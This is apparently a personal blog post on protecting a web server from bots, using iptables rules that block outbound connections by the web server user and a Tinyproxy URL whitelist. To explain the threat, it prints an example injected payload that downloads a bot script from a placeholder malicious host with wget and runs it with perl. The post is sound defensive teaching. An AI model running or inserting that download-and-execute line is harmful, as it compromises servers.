Claus Beerta

Securing your Web server against Bots

Bots usually operate in a fairly similar way to get onto your server:

  • They exploit a known vulnerability in a PHP script to inject some code
  • This injected code is usually very simple, downloading the Trojan from a remote address with curl or wget to a temporary directory
  • Once the Trojan has been downloaded, it is executed through the same PHP vulnerability
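To illustrate the pattern, an injected payload typically boils down to a one-liner along these lines (the host and file names here are invented for illustration):

```shell
# Hypothetical injected payload -- host and file names are made up
cd /tmp
wget http://<malicious host>/bot.txt
perl bot.txt
```

Note that both the download step and the execution step happen as the user the web server runs as, which is exactly what the iptables rules below take advantage of.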

A method I’ve employed in the past to at least stop these automated Trojan spreads is to add iptables rules that forbid the user the web server runs as from making any connections to the outside world:

# Allow Everything local
iptables -A OUTPUT -o lo+ -m owner --uid-owner 33 -j ACCEPT
iptables -A OUTPUT -d <Official IP Address of your server> -p tcp -m owner --uid-owner 33 -j ACCEPT
# Allow DNS Requests 
iptables -A OUTPUT -p udp -m owner --uid-owner 33 -m udp --dport 53 -j ACCEPT
# Allow HTTP Answers to clients requesting stuff from the Web Server (HTTP+HTTPS)
iptables -A OUTPUT -p tcp -m owner --uid-owner 33 -m tcp --sport 80 -j ACCEPT
iptables -A OUTPUT -p tcp -m owner --uid-owner 33 -m tcp --sport 443 -j ACCEPT
# Log everything that gets dropped
iptables -A OUTPUT -m owner --uid-owner 33 -m limit --limit 5/sec -j LOG --log-prefix "www-data: "
# and finally drop anything that tries to leave
iptables -A OUTPUT -m owner --uid-owner 33 -j REJECT --reject-with icmp-port-unreachable
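With these rules loaded you can verify the lockdown by trying an outbound request as the web server user yourself (this sketch assumes the user is www-data with uid 33 and that curl is installed):

```shell
# Run as root: an outbound connection as www-data should now fail,
# since the final REJECT rule answers with icmp-port-unreachable
sudo -u www-data curl --max-time 5 http://www.example.com/

# The LOG rule records every blocked attempt; where the kernel log
# ends up depends on your syslog configuration
grep 'www-data:' /var/log/syslog | tail
```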

# Force outgoing request through http proxy on port 8080
iptables -t nat -A OUTPUT -p tcp -m owner --uid-owner 33 -m tcp --dport 80 -j DNAT --to-destination 127.0.0.1:8080
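To confirm the rules are in place and actually matching traffic, you can inspect the packet counters in both the filter and nat tables:

```shell
# Show the OUTPUT rules with packet/byte counters; the counters on the
# owner-match rules increase as the web server user generates traffic
iptables -L OUTPUT -v -n --line-numbers

# The DNAT rule lives in the nat table's OUTPUT chain
iptables -t nat -L OUTPUT -v -n
```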

“But now all my RSS clients and HTTP includes won’t work anymore!” There are two ways around the fact that nothing on your web server is allowed to talk to the evil internet anymore:

  1. Insert `ACCEPT` rules into the iptables chain for the destinations you want to allow. This method is tedious and error-prone, as you constantly need to keep track of which IPs the services you use have and update your iptables rules accordingly.
  2. Use a simple HTTP proxy to pass through the requests you want to allow.

I’ve always preferred the HTTP proxy method. While it is a bit more work to set up initially, the added security is worth it: since you can allow requests on a URL basis, you no longer need to worry about the remote side changing IPs. Besides, if you allow IPs with iptables, people can upload their Trojans to those whitelisted web servers and bypass all your fancy protection.

A good proxy that allows for extensive filtering while still having a small footprint is Tinyproxy. A few settings you will want to tune:

# Only listen on localhost
Listen 127.0.0.1
# Allow requests from your local server only
Allow <Official IP Address of your server>

# Enable Filtering, and deny everything by default
Filter "/etc/tinyproxy/filter"
FilterURLs On
FilterExtended On
FilterDefaultDeny Yes

Looking at your Tinyproxy log files, you should now see requests being denied whenever a page on the web server tries to include external resources:

CONNECT   Aug 01 05:11:57 [16731]: Connect (file descriptor 7): []
CONNECT   Aug 01 05:11:57 [16731]: Request (file descriptor 7): GET /1.0/user/cb0amg/recenttracks.rss HTTP/1.0
INFO      Aug 01 05:11:57 [16731]: process_request: trans Host GET for 7
NOTICE    Aug 01 05:11:57 [16731]: Proxying refused on filtered url ""
INFO      Aug 01 05:11:57 [16731]: Not sending client headers to remote machine

Voilà, my Wordpress installation tried to grab the recent tracks RSS feed; I want to allow that, so I’ll just add this to my Tinyproxy filter file:

^http://<remote host>/1\.0/user/cb0amg/recenttracks\.rss

Now anything you want your Web Server to access, you can simply add to your Tinyproxy filter.
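You can check a filter entry from the server itself by sending requests through the proxy by hand (a sketch, assuming Tinyproxy listens on 127.0.0.1:8080 as configured above; the hosts are placeholders):

```shell
# A URL matching an entry in /etc/tinyproxy/filter passes through
http_proxy=http://127.0.0.1:8080 curl -s http://<remote host>/1.0/user/cb0amg/recenttracks.rss

# Anything else is refused by FilterDefaultDeny and shows up
# as "Proxying refused on filtered url" in the Tinyproxy log
http_proxy=http://127.0.0.1:8080 curl -s http://www.example.com/
```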

Remember though: this is not blanket protection against every software flaw that exists! You should still keep your software up to date at all times.